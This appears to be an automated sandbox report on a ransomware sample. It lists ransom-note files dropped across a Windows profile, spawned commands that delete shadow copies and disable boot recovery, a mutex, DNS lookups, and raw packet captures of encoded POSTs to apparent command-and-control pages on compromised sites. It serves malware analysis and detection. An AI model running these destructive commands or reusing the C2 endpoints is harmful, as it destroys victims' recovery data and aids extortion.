Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Security\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\Install\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Templates\excel4.xls
Creates File: C:\Documents and Settings\Administrator\Templates\wordpfct.wpd
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\Content\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\MetaData\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Cache\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013061320130614\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Entertainment\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Preferences\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Credentials\S-1-5-21-XXXXXXXXXX-XXXXXXXXXX-XXXXXXXXXX-500\HELP_RECOVER_instructions+hec.png
Creates File: C:\Documents and Settings\Administrator\My Documents\My Music\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Cookies\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\Install\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\IMJP8_1\HELP_RECOVER_instructions+hec.txt
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\Search70\HELP_RECOVER_instructions+hec.html
Creates File: C:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\appcompat.txt
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\My Documents\My Music\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\Certificates\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\My Documents\My Pictures\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\Sunset.jpg
Creates FileC:\Documents and Settings\Administrator\Application Data\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Templates\excel.xls
Creates FileC:\Documents and Settings\Administrator\Templates\powerpnt.ppt
Creates FileC:\Documents and Settings\Administrator\Application Data\AdobeUM\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\Collab\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\PrintHood\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CTLs\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\D4Z32ED8\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Cookies\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\All Users\DRM\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\SendTo\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Credentials\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Startup\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\dd_netfx20MSI3716.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\9.0\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\JavaScripts\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Templates\quattro.wb2
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\eng\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Security\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\0019E545\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Music\Beethoven's Symphony No. 9 (Scherzo).wma
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_10.0.30319\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\SystemCertificates\My\CRLs\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Reader9\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\MMC\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\HELP_RECOVER_instructions+hec.html
Creates FilePIPE\srvsvc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\7.0\Cache\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\0019E545\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\My Documents\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\CryptnetUrlCache\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Recent\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Updater6\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_10.0.30319\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\NetHood\shared on Samba 3.6.9-151.el6 (192.168.1.1)\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\All Users\Documents\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Music\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows Media\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\WERfd9e.dir00\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\all\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013052720130603\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\All Users\Documents\My Music\Sample Playlists\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Reader 9.3\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\My Documents\My Pictures\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\Forms\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\All Users\Documents\My Pictures\Sample Pictures\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Templates\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Accessories\Accessibility\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\JavaScripts\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Media Player\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Windows\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013052720130603\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013061320130614\HELP_RECOVER_instructions+hec.txt
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Acrobat\9.0\HELP_RECOVER_instructions+hec.png
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\HELP_RECOVER_instructions+hec.html
Creates FileC:\Documents and Settings\Administrator\Application Data\Adobe\Linguistics\Dictionaries\HELP_RECOVER_instructions+hec.txt
Creates Processvssadmin.exe delete shadows /all /Quiet
Creates Processbcdedit.exe /set {current} recoveryenabled off
Creates Mutex__sys_234238233295

Process
↳ bcdedit.exe /set {current} recoveryenabled off

Process
↳ vssadmin.exe delete shadows /all /Quiet

Creates FilePIPE\lsarpc

Network Details:

DNShnb.net
Type: A
222.165.133.242
DNSfirecheerleaders.fr
Type: A
213.186.33.171
DNSladiesdehaan.be
Type: A
62.210.92.9
DNSchonburicoop.net
Type: A
27.254.96.151
DNSpasslift.com
Type: A
217.116.196.239
DNSactionpourisrael.com
Type: A
213.186.33.4
HTTP POSThttp://hnb.net/templates/assets/email_tmpl/uploads/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
HTTP POSThttp://firecheerleaders.fr/modules/mod_cmscore/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
HTTP POSThttp://ladiesdehaan.be/modules/mod_cmscore/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
HTTP POSThttp://chonburicoop.net/tmp/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
HTTP POSThttp://passlift.com/templates/sj_icenter/html/mod_k2_content/Default/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
HTTP POSThttp://actionpourisrael.com/modules/mod_speedup/mzsys.php
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko
Flows TCP192.168.1.1:1031 ➝ 222.165.133.242:80
Flows TCP192.168.1.1:1032 ➝ 213.186.33.171:80
Flows TCP192.168.1.1:1033 ➝ 62.210.92.9:80
Flows TCP192.168.1.1:1034 ➝ 27.254.96.151:80
Flows TCP192.168.1.1:1035 ➝ 217.116.196.239:80
Flows TCP192.168.1.1:1036 ➝ 213.186.33.4:80

Raw Pcap
0x00000340 (00832)   30353844 30303934 42424344 43383341   058D0094BBCDC83A
0x00000350 (00848)   45373432 36373246 42463637 31464241   E742672FBF671FBA
0x00000360 (00864)   38393231 45354132 36323739 42363836   8921E5A26279B686
0x00000370 (00880)   35343132 35364132 35463531 36373845   541256A25F51678E
0x00000380 (00896)   42354444 34463733 35454335 37333837   B5DD4F735EC57387
0x00000390 (00912)   36303438 39434638 39344332 32304130   60489CF894C220A0
0x000003a0 (00928)   36444145 43353741 31443838 37323533   6DAEC57A1D887253
0x000003b0 (00944)   30384543 35374131 44383837 32353330   08EC57A1D8872530
0x000003c0 (00960)   38353330 38                           85308

0x00000000 (00000)   504f5354 202f7465 6d706c61 7465732f   POST /templates/
0x00000010 (00016)   736a5f69 63656e74 65722f68 746d6c2f   sj_icenter/html/
0x00000020 (00032)   6d6f645f 6b325f63 6f6e7465 6e742f44   mod_k2_content/D
0x00000030 (00048)   65666175 6c742f6d 7a737973 2e706870   efault/mzsys.php
0x00000040 (00064)   20485454 502f312e 310d0a41 63636570    HTTP/1.1..Accep
0x00000050 (00080)   743a202c ed04d043 2c202c20 2c202c20   t: ,...C, , , , 
0x00000060 (00096)   2c202c20 2c202c20 2c202c20 2c202c20   , , , , , , , , 
0x00000070 (00112)   2c202c20 2c202c20 2c202c20 2c202c20   , , , , , , , , 
0x00000080 (00128)   2c202c20 2c200d0a 436f6e74 656e742d   , , , ..Content-
0x00000090 (00144)   54797065 3a206170 706c6963 6174696f   Type: applicatio
0x000000a0 (00160)   6e2f782d 7777772d 666f726d 2d75726c   n/x-www-form-url
0x000000b0 (00176)   656e636f 6465640d 0a557365 722d4167   encoded..User-Ag
0x000000c0 (00192)   656e743a 204d6f7a 696c6c61 2f352e30   ent: Mozilla/5.0
0x000000d0 (00208)   20285769 6e646f77 73204e54 20362e33    (Windows NT 6.3
0x000000e0 (00224)   3b20574f 5736343b 20547269 64656e74   ; WOW64; Trident
0x000000f0 (00240)   2f372e30 3b20546f 7563683b 2072763a   /7.0; Touch; rv:
0x00000100 (00256)   31312e30 29206c69 6b652047 65636b6f   11.0) like Gecko
0x00000110 (00272)   0d0a486f 73743a20 70617373 6c696674   ..Host: passlift
0x00000120 (00288)   2e636f6d 0d0a436f 6e74656e 742d4c65   .com..Content-Le
0x00000130 (00304)   6e677468 3a203634 350d0a43 61636865   ngth: 645..Cache
0x00000140 (00320)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x00000150 (00336)   68650d0a 0d0a6461 74613d44 46393638   he....data=DF968
0x00000160 (00352)   43453638 42343744 36453131 35363233   CE68B47D6E115623
0x00000170 (00368)   46364646 32413145 37423244 44324441   F6FF2A1E7B2DD2DA
0x00000180 (00384)   36303137 31454142 34454633 46354241   60171EAB4EF3F5BA
0x00000190 (00400)   44314137 35324645 32373037 39363636   D1A752FE27079666
0x000001a0 (00416)   37453643 43303042 38443746 34413143   7E6CC00B8D7F4A1C
0x000001b0 (00432)   31423232 32304332 33373533 32323336   1B2220C237532236
0x000001c0 (00448)   46373943 33454445 33333946 45314439   F79C3EDE339FE1D9
0x000001d0 (00464)   35353435 33384131 46383734 37303635   554538A1F8747065
0x000001e0 (00480)   44443735 37303535 30463330 36363036   DD7570550F306606
0x000001f0 (00496)   36333543 36453345 32353141 32324531   635C6E3E251A22E1
0x00000200 (00512)   31333842 35323742 37304436 36354541   138B527B70D665EA
0x00000210 (00528)   42363146 42323631 45453432 30353936   B61FB261EE420596
0x00000220 (00544)   46323638 46393643 43464333 39323231   F268F96CCFC39221
0x00000230 (00560)   39323235 38304332 38453635 43433530   922580C28E65CC50
0x00000240 (00576)   43313034 30363544 34304234 45423334   C104065D40B4EB34
0x00000250 (00592)   35334536 36444341 30454235 42433041   53E66DCA0EB5BC0A
0x00000260 (00608)   39423536 44324342 33433641 31323830   9B56D2CB3C6A1280
0x00000270 (00624)   46324237 39453337 39433243 33364330   F2B79E379C2C36C0
0x00000280 (00640)   36463642 37393231 32334233 33303036   6F6B792123B33006
0x00000290 (00656)   37303534 37373034 33353244 46393233   70547704352DF923
0x000002a0 (00672)   43433533 43363945 41433139 35413839   CC53C69EAC195A89
0x000002b0 (00688)   46454145 31303835 35454545 38304641   FEAE10855EEE80FA
0x000002c0 (00704)   30453045 41453642 36393643 37453144   0E0EAE6B696C7E1D
0x000002d0 (00720)   32353736 33464342 41383530 36433534   25763FCBA8506C54
0x000002e0 (00736)   32353837 41304242 34433744 31413234   2587A0BB4C7D1A24
0x000002f0 (00752)   37463532 32334346 31334143 41443043   7F5223CF13ACAD0C
0x00000300 (00768)   36413741 34423432 41343042 41323945   6A7A4B42A40BA29E
0x00000310 (00784)   34333344 33353138 46423946 31464245   433D3518FB9F1FBE
0x00000320 (00800)   35463144 32443332 43463445 31464546   5F1D2D32CF4E1FEF
0x00000330 (00816)   31363645 46394443 41443038 30454646   166EF9DCAD080EFF
0x00000340 (00832)   39453343 39394339 38334536 33373332   9E3C99C983E63732
0x00000350 (00848)   32394242 43333431 43383332 30444542   29BBC341C8320DEB
0x00000360 (00864)   43313035 35363532 37303538 44303039   C10556527058D009
0x00000370 (00880)   34424243 44433833 41453734 32363732   4BBCDC83AE742672
0x00000380 (00896)   46424636 37314642 41383932 31453541   FBF671FBA8921E5A
0x00000390 (00912)   32363237 39423638 36353431 32353641   26279B686541256A
0x000003a0 (00928)   32354635 31363738 45423544 44344637   25F51678EB5DD4F7
0x000003b0 (00944)   33354543 35373338 37363034 38394346   35EC5738760489CF
0x000003c0 (00960)   38393443 32323041 30364441 45433537   894C220A06DAEC57
0x000003d0 (00976)   41314438 38373235 333038              A1D88725308

0x00000000 (00000)   504f5354 202f6d6f 64756c65 732f6d6f   POST /modules/mo
0x00000010 (00016)   645f7370 65656475 702f6d7a 7379732e   d_speedup/mzsys.
0x00000020 (00032)   70687020 48545450 2f312e31 0d0a4163   php HTTP/1.1..Ac
0x00000030 (00048)   63657074 3a202ced 04d0432c 202c202c   cept: ,...C, , ,
0x00000040 (00064)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000050 (00080)   202c202c 202c202c 202c202c 202c202c    , , , , , , , ,
0x00000060 (00096)   202c202c 202c202c 200d0a43 6f6e7465    , , , , ..Conte
0x00000070 (00112)   6e742d54 7970653a 20617070 6c696361   nt-Type: applica
0x00000080 (00128)   74696f6e 2f782d77 77772d66 6f726d2d   tion/x-www-form-
0x00000090 (00144)   75726c65 6e636f64 65640d0a 55736572   urlencoded..User
0x000000a0 (00160)   2d416765 6e743a20 4d6f7a69 6c6c612f   -Agent: Mozilla/
0x000000b0 (00176)   352e3020 2857696e 646f7773 204e5420   5.0 (Windows NT 
0x000000c0 (00192)   362e333b 20574f57 36343b20 54726964   6.3; WOW64; Trid
0x000000d0 (00208)   656e742f 372e303b 20546f75 63683b20   ent/7.0; Touch; 
0x000000e0 (00224)   72763a31 312e3029 206c696b 65204765   rv:11.0) like Ge
0x000000f0 (00240)   636b6f0d 0a486f73 743a2061 6374696f   cko..Host: actio
0x00000100 (00256)   6e706f75 72697372 61656c2e 636f6d0d   npourisrael.com.
0x00000110 (00272)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x00000120 (00288)   20363435 0d0a4361 6368652d 436f6e74    645..Cache-Cont
0x00000130 (00304)   726f6c3a 206e6f2d 63616368 650d0a0d   rol: no-cache...
0x00000140 (00320)   0a646174 613d4446 39363843 45363842   .data=DF968CE68B
0x00000150 (00336)   34374436 45313135 36323346 36464632   47D6E115623F6FF2
0x00000160 (00352)   41314537 42324444 32444136 30313731   A1E7B2DD2DA60171
0x00000170 (00368)   45414234 45463346 35424144 31413735   EAB4EF3F5BAD1A75
0x00000180 (00384)   32464532 37303739 36363637 45364343   2FE270796667E6CC
0x00000190 (00400)   30304238 44374634 41314331 42323232   00B8D7F4A1C1B222
0x000001a0 (00416)   30433233 37353332 32333646 37394333   0C237532236F79C3
0x000001b0 (00432)   45444533 33394645 31443935 35343533   EDE339FE1D955453
0x000001c0 (00448)   38413146 38373437 30363544 44373537   8A1F8747065DD757
0x000001d0 (00464)   30353530 46333036 36303636 33354336   0550F306606635C6
0x000001e0 (00480)   45334532 35314132 32453131 33384235   E3E251A22E1138B5
0x000001f0 (00496)   32374237 30443636 35454142 36314642   27B70D665EAB61FB
0x00000200 (00512)   32363145 45343230 35393646 32363846   261EE420596F268F
0x00000210 (00528)   39364343 46433339 32323139 32323538   96CCFC3922192258
0x00000220 (00544)   30433238 45363543 43353043 31303430   0C28E65CC50C1040
0x00000230 (00560)   36354434 30423445 42333435 33453636   65D40B4EB3453E66
0x00000240 (00576)   44434130 45423542 43304139 42353644   DCA0EB5BC0A9B56D
0x00000250 (00592)   32434233 43364131 32383046 32423739   2CB3C6A1280F2B79
0x00000260 (00608)   45333739 43324333 36433036 46364237   E379C2C36C06F6B7
0x00000270 (00624)   39323132 33423333 30303637 30353437   92123B3300670547
0x00000280 (00640)   37303433 35324446 39323343 43353343   704352DF923CC53C
0x00000290 (00656)   36394541 43313935 41383946 45414531   69EAC195A89FEAE1
0x000002a0 (00672)   30383535 45454538 30464130 45304541   0855EEE80FA0E0EA
0x000002b0 (00688)   45364236 39364337 45314432 35373633   E6B696C7E1D25763
0x000002c0 (00704)   46434241 38353036 43353432 35383741   FCBA8506C542587A
0x000002d0 (00720)   30424234 43374431 41323437 46353232   0BB4C7D1A247F522
0x000002e0 (00736)   33434631 33414341 44304336 41374134   3CF13ACAD0C6A7A4
0x000002f0 (00752)   42343241 34304241 32394534 33334433   B42A40BA29E433D3
0x00000300 (00768)   35313846 42394631 46424535 46314432   518FB9F1FBE5F1D2
0x00000310 (00784)   44333243 46344531 46454631 36364546   D32CF4E1FEF166EF
0x00000320 (00800)   39444341 44303830 45464639 45334339   9DCAD080EFF9E3C9
0x00000330 (00816)   39433938 33453633 37333232 39424243   9C983E6373229BBC
0x00000340 (00832)   33343143 38333230 44454243 31303535   341C8320DEBC1055
0x00000350 (00848)   36353237 30353844 30303934 42424344   6527058D0094BBCD
0x00000360 (00864)   43383341 45373432 36373246 42463637   C83AE742672FBF67
0x00000370 (00880)   31464241 38393231 45354132 36323739   1FBA8921E5A26279
0x00000380 (00896)   42363836 35343132 35364132 35463531   B686541256A25F51
0x00000390 (00912)   36373845 42354444 34463733 35454335   678EB5DD4F735EC5
0x000003a0 (00928)   37333837 36303438 39434638 39344332   738760489CF894C2
0x000003b0 (00944)   32304130 36444145 43353741 31443838   20A06DAEC57A1D88
0x000003c0 (00960)   37323533 30383041 30364441 45433537   7253080A06DAEC57
0x000003d0 (00976)   41314438 38373235 333038              A1D88725308


Strings